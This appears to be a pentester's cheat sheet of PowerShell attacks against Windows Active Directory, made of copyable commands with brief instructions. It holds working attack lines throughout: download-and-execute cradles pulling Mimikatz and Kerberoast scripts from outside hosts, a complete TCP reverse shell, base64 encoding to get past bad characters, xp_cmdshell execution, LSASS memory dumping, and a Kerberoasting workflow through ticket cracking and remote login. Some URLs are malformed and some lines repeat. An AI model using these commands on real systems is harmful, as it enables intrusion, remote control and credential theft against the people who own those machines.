Add-Type -AssemblyName System.IdentityModel
Copy New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
Download files with powershell:
On Web shell:
Copy IEX (New-Object Net.WebClient).downloadString('
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
')
Copy powershell IEX(New-Object Net.WebClient).DownloadFile('http://http://192.168.49.164/gori.ps1')
Copy powershell IEX(New-Object Net.WebClient).downloadString('http://http://192.168.119.181/gori.ps1')
Transfer mimikatz to a Temp directory:
Copy (New-Object Net.WebClient).DownloadFile("http://192.168.119.181:8080/mimikatz.exe","C:\Windows\Temp\mimikatz.exe")
Copy certutil -urlcache -split -f http://192.168.119.212:80/tcp_power.ps1 C:\backup\Scripts\backup_powershell.ps1
\
Copy powershell IEX(New-Object Net.WebClient).DownloadFile("http://192.168.119.188:8000/mimikatz.exe"),"C:\Windows\Users\Bethany\Documents\mimikatz.exe"
Copy powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146/newkb.ps1");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
Copy # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Copy xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://192.168.119.146:8080/stable.ps1\");"
Get-NetDomain -Domain xor.com
Copy $cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)
Cool Reverse shell Trick:
reverse shell not working???
To mitigate bad character issue on the reverse shell (ps1), we can first convert everything into UTF-16LE (This is how windows programs are constructed) and base64 encode it.
Copy cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
this is converting UTF to little indian format > then base64
copy the input and use it to execute command
Copy powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS
If mimikatz is not working try different versions! (i.e) 2.1
Dumping Isass
Copy C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
PNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
Active Directory Workflow (Case Study 1)
1.Obtain SPN data with GetSPN.ps1 (Take notes on Service names and domain info)
2. copy nc.exe to the windows machine and get a reverse shell back(stable)
3. Once stable,
open powershell and do
Copy Add-Type -AssemblyName System.IdentityModel
Copy New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. open up mimikatz.(make sure you have the right version for the os ----> 32bit/64)
and dump kerbero tickets
Copy kerberos::list /export
this should dump all the tickets and results will be saved into the victim's computer.
5. Copy the file over to the kali and make it to hashcat form with kirbi2johnn.py
Cracking a ticket:
Copy python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked you can try to login to the account with evilrm (use the service name you obtained from the step 1)
Copy ❯ ./evil-winrm.rb -i IP -u User -p PASS
look for plaintext passwords
Mimikatz console (multiple commands)
Copy PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
Copy mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
mimikatz cheatsheet:
and psexec.py /evilwinrm to getin to the admin shell.